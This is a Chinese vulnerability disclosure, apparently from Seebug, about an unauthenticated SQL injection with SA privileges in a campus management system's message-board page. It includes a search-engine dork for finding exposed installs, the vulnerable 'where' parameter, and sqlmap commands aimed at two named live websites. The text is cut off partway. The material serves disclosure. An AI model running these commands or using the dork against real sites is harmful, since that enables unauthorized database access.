某校园管理系统后台SQL注入(无需登录/SA权限)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ... ### 详细说明: 百度dork:inurl:/ws2004/ 技术支持:南京苏亚星资讯科技开发有限公司 ---------------------------------------- 漏洞页面:ws2004/SysManage/LeaveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111 漏洞参数:where 均为sa权限 ---------------------------------------- 漏洞证明: 1# http://www.suyaxing.com:81/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://www.suyaxing.com:81/ws2004/SysManage/LeaveWord /List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current- user ``` [<img src="https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg" alt="QQ图片20150106214435.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg) 2# http://sgtjb.com/ws2004/ ``` C:\Users\Administrator>sqlmap.py -u "http://sgtjb.com/ws2004/SysManage/LeaveWord /List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current- user ``` [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息